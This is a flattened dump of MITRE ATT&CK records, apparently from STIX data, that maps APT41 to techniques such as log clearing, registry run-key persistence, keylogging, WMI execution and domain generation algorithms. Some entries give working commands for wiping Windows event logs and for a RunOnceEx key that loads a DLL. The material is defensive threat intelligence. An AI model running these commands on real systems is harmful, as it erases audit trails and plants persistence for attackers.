One common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)
|
||
|
||
Additionally, some cryptocurrency mining malware identifies and kills off processes belonging to competing malware so that they do not compete for resources.(Citation: Trend Micro War of Crypto Miners)
|
||
|
||
Adversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
|
||
technique_id : T1496
|
||
matrix : mitre-attack
|
||
platform : ['Windows', 'IaaS', 'Linux', 'macOS', 'Containers']
|
||
data_sources : ['Network Traffic: Network Traffic Flow', 'File: File Creation', 'Network Traffic: Network Connection Creation', 'Sensor Health: Host Status', 'Process: Process Creation', 'Command: Command Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created a RAR archive of targeted files for exfiltration.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--89328749-11c5-416d-99b9-f3039afc487a
|
||
revoked : False
|
||
technique : Archive via Utility
|
||
technique_description : Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.
|
||
|
||
Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third-party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems.
|
||
|
||
On Windows, <code>diantz</code> or <code>makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration.
|
||
|
||
Adversaries may also use third-party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection')]
|
||
technique_id : T1560.001
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Process: Process Creation', 'Command: Command Execution', 'File: File Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a malware variant called GOODLUCK to modify the registry in order to steal credentials.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--c8475b1b-c98f-4fdc-89dd-c9b04e6fbd9c
|
||
revoked : False
|
||
technique : Modify Registry
|
||
technique_description : Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, to remove information as part of cleaning up, or to support other techniques that aid in persistence and execution.
|
||
|
||
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
|
||
|
||
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
|
||
|
||
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1112
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: OS API Execution', 'Network Traffic: Network Traffic Flow', 'Command: Command Execution', 'Windows Registry: Windows Registry Key Deletion', 'Windows Registry: Windows Registry Key Creation', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--6495ae23-3ab4-43c5-a94f-5638a2c31fd2
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by clearing Windows security and system events.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--4cbd1250-5e79-46c0-b38f-83bd5942f44c
|
||
revoked : False
|
||
technique : Clear Windows Event Logs
|
||
technique_description : Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
|
||
|
||
The event logs can be cleared with the following utility commands:
|
||
|
||
* <code>wevtutil cl system</code>
|
||
* <code>wevtutil cl application</code>
|
||
* <code>wevtutil cl security</code>
|
||
|
||
These logs may also be cleared through other mechanisms, such as the Event Viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security event log and, after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
|
||
technique_id : T1070.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Command: Command Execution', 'File: File Deletion', 'Process: OS API Execution', 'Process: Process Creation']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) created and modified startup files for persistence.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) added a registry key in <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost</code> to establish persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
|
||
relationship_id : relationship--6ad8e998-041f-491d-8691-4990022248e0
|
||
revoked : False
|
||
technique : Registry Run Keys / Startup Folder
|
||
technique_description : Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
|
||
|
||
The following run keys are created by default on Windows systems:
|
||
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>
|
||
|
||
Run keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> key is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)
|
||
|
||
Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.
|
||
|
||
The following Registry keys can be used to set startup folder items for persistence:
|
||
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
|
||
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>
|
||
* <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>
|
||
|
||
The following Registry keys can control automatic startup of services during boot:
|
||
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>
|
||
|
||
Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:
|
||
|
||
* <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
|
||
* <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>
|
||
|
||
Programs listed in the <code>load</code> value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.
|
||
|
||
By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
|
||
|
||
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
|
||
technique_id : T1547.001
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Command: Command Execution', 'File: File Modification', 'Process: Process Creation', 'Windows Registry: Windows Registry Key Creation', 'Windows Registry: Windows Registry Key Modification']
|
||
permissions_required : ['Administrator', 'User']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the WMIEXEC utility to execute <code>whoami</code> commands on remote machines.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--ae12b657-a640-40c6-99b7-931ed10705de
|
||
revoked : False
|
||
technique : System Owner/User Discovery
|
||
technique_description : Adversaries may attempt to identify the primary user, the currently logged-in user, the set of users that commonly use a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
|
||
|
||
Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.
|
||
|
||
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show users` and `show ssh` can be used to display users currently logged into the device.(Citation: show_ssh_users_cmd_cisco)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
|
||
technique_id : T1033
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'Network']
|
||
data_sources : ['Active Directory: Active Directory Object Access', 'Process: OS API Execution', 'Command: Command Execution', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Windows Registry: Windows Registry Key Access', 'File: File Access', 'Process: Process Access']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via [PowerSploit](https://attack.mitre.org/software/S0194).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--f395cb28-5bc0-487e-b679-155ac785b7d9
|
||
revoked : False
|
||
technique : Windows Management Instrumentation
|
||
technique_description : Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM) and [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) (WinRM).(Citation: MSDN WMI) Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.(Citation: MSDN WMI)(Citation: FireEye WMI 2015)
|
||
|
||
An adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015)
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
|
||
technique_id : T1047
|
||
matrix : mitre-attack
|
||
platform : ['Windows']
|
||
data_sources : ['Network Traffic: Network Connection Creation', 'Process: Process Creation', 'WMI: WMI Creation', 'Command: Command Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
technique_ref : attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used compromised credentials to log on to other systems.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
|
||
relationship_id : relationship--0528b64e-e719-44a9-94aa-0576bd9a87ec
|
||
revoked : False
|
||
technique : Valid Accounts
|
||
technique_description : Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
|
||
|
||
In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.(Citation: CISA MFA PrintNightmare)
|
||
|
||
The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.(Citation: TechNet Credential Theft)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1078
matrix : mitre-attack
platform : ['Windows', 'Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Linux', 'macOS', 'Google Workspace', 'Containers', 'Network']
data_sources : ['Logon Session: Logon Session Creation', 'User Account: User Account Authentication', 'Logon Session: Logon Session Metadata']
permissions_required : ['User', 'Administrator']
effective_permissions : ['User', 'Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a keylogger called GEARSHIFT on a target system.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--f480c10c-6a40-4fc7-9380-c2690c70a599
revoked : False
technique : Keylogging
technique_description : Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems.(Citation: Talos Kimsuky Nov 2021)
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
* Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
* Reading raw keystroke data from the hardware buffer.
* Windows Registry modifications.
* Custom drivers.
* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='collection'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='credential-access')]
technique_id : T1056.001
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux', 'Network']
data_sources : ['Driver: Driver Load', 'Process: OS API Execution', 'Windows Registry: Windows Registry Key Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--bd369cd9-abb8-41ce-b5bb-fff23ee86c00
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--10d118e8-c421-486f-a56a-bbe1ed621c62
revoked : False
technique : Compromise Software Supply Chain
technique_description : Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.
Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1195.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['File: File Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has used DGAs to change their C2 servers monthly.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--8488f2ee-be97-458c-894b-830add635fa8
revoked : False
technique : Domain Generation Algorithms
technique_description : Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc.). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server, malware may employ a DGA as a means of reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1568.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Flow']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting the healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
aliases : ['APT41', 'Wicked Panda']
